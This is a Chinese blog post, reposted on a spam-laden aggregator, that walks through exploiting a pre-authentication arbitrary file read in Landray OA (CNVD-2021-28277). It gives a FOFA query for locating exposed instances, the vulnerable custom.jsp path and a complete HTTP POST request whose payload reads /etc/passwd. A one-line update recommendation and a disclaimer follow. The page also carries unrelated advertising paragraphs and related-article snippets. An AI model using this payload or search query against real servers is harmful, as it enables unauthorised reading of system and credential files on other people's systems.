电脑常识蓝凌OA前台任意文件读取漏洞利用

news/2024/12/1 0:31:47/

电脑常识蓝凌OA前台任意文件读取漏洞利用

根据IAB E“2021年欧洲广告报告”,2021年下半年欧洲数字广告强劲复苏,全年增长6%,达到694亿欧元。刷赞平台的相关资讯可以到我们网站了解一下,从专业角度出发为您解答相关问题,给您优质的服务! 教程弟

根据IAB E“2021年欧洲广告报告”,2021年下半年欧洲数字广告强劲复苏,全年增长6%,达到694亿欧元。刷赞平台的相关资讯可以到我们网站了解一下,从专业角度出发为您解答相关问题,给您优质的服务!


近期CNVD爆出漏洞编号:CNVD-2021-28277,首次公开日期为2021-04-15,蓝凌oa存在多个漏洞,攻击者可利用该漏洞获取服务器控制权。今天挑选一个蓝凌OA前台任意文件读取漏洞进行分析使用。链接:https://www.cnvd.org.cn/flaw/show/CNVD-2021-28277

蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞。

一、漏洞位置

FOFA网络空间引擎,FOFA语法:app="Landray-OA系统"

打开测试网站前台登录页面:

漏洞的路径在 xxxxx/sys/ui/extend/varkind/custom.jsp下面,也就是custom.jsp里面,需要使用post请求方式,请求的参数为var={"body":{"file":"file:///etc/passwd"}}

使用hackbar火狐插件修改为post请求传递参数,打开 xxxxx/sys/ui/extend/varkind/custom.jsp为如下画面显示

二、漏洞验证

可以看见,只需对file里面的参数进行修改,就可以任意读取系统文件passwd信息的高危漏洞;

或者使用burp测试:

漏洞payload为

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=EA419896062AC4B6FE325FF08B8AF36E
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

var={"body":{"file":"file:///etc/passwd"}}

修复建议:建议使用蓝凌OA的系统更新系统至最新版本,附录地址:https://www.landray.com.cn/

特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。

作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考

文章来源:https://www.cnblogs.com/pandana/archive/2021/05/18/14779233.html

版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:https://www.jcdi.cn/fwq/30510.html

阿哇教育
www.awaedu.com
作文哥
www.zuowenge.cn
搜码吧
www.somanba.cn
搜白度
www.sobd.cc

http://www.ppmy.cn/news/341286.html

相关文章

蓝凌生态OA

8月28日,华为发起全国首个基于数字赋能的“828 B2B企业节”,为各大企业搭建一个创新发展平台帮助他们“成就好生意,成为好企业”。 蓝凌软件作为华为首家数字化办公服务商,在本次企业节中,针对企业数字化转型难题提供…

蓝凌OA二次开发手册

1.蓝凌OA表单前端调用后台数据 一、后台存储过程: create procedure sp_test ftext nvarchar(50) as begin select ftext as 测试1,aaaa as 测试2 end --exec sp_test bbb 二、主表单配置script: 函数名:gettest() script: var em…

蓝凌OA前台任意文件读取漏洞利用

近期CNVD爆出漏洞编号:CNVD-2021-28277,首次公开日期为2021-04-15,蓝凌oa存在多个漏洞,攻击者可利用该漏洞获取服务器控制权。今天挑选一个蓝凌OA前台任意文件读取漏洞进行分析使用。链接:https://www.cnvd.org.cn/fla…

蓝凌ekp开发_蓝凌OA系统,蓝凌EKP,蓝凌KK__房地产案例应用__恒大集团

作为中国地产行业标杆,恒大集团拥有员工39000多人,在全国33个城市设立了分公司,在全国122个主要城市拥有大型项目229个。如何实现全集团的协同沟通?如何结合业务规范、统一流程?如何实现专业知识、业务案例和管理经验快…

蓝凌OA常用表整理

SELECT * FROM V_FI_ORG_EMP --用户表视图(关联单位)SELECT * FROM FI_ORG_EMP --用户表 SELECT * FROM FI_ORG_INFO --单位表 SELECT * FROM V_FI_ORG_DEPT --部门表视图(关联单位) SELECT * FROM FI_ORG_POSITION --职位表 SELECT * FROM OA_FORM_INFO where name …

蓝凌OA统计程流审批效率SQL

蓝凌OA版本v11 SELECT KRM.fd_id, --流程IDKRT.fd_name AS WF_NAME, --流程模板名称KRM.fd_number, --流程编号KRM.doc_subject, --流程主题SOE.fd_name AS EMP_NAME, --节点审批人或起草人LHW.fd_start_date, --节点审批开始时间LHW.fd_finish_date, --节点审批完成时间…

蓝凌OA漏洞分析与处置方案

漏洞1:蓝凌OA sysSearchMain.do 远程命令执行漏洞 漏洞描述 蓝凌OA sysSearchMain.do文件 存在任意文件写入漏洞,攻击者获取后台权限后可通过漏洞写入任意文件,也可以通过 custom.jsp 文件未授权写入恶意文件 漏洞影响 蓝凌OA 搜索语法

【漏洞复现】蓝凌OA近期公开几个漏洞汇总

0x00 蓝凌OA custom.jsp 任意文件读取漏洞 1、app”Landray-OA系统” 2、漏洞复现 出现漏洞的文件为 custom.jsp <%page import"com.landray.kmss.util.ResourceUtil"%> <%page import"net.sf.json.JSONArray"%> <%page import"ne…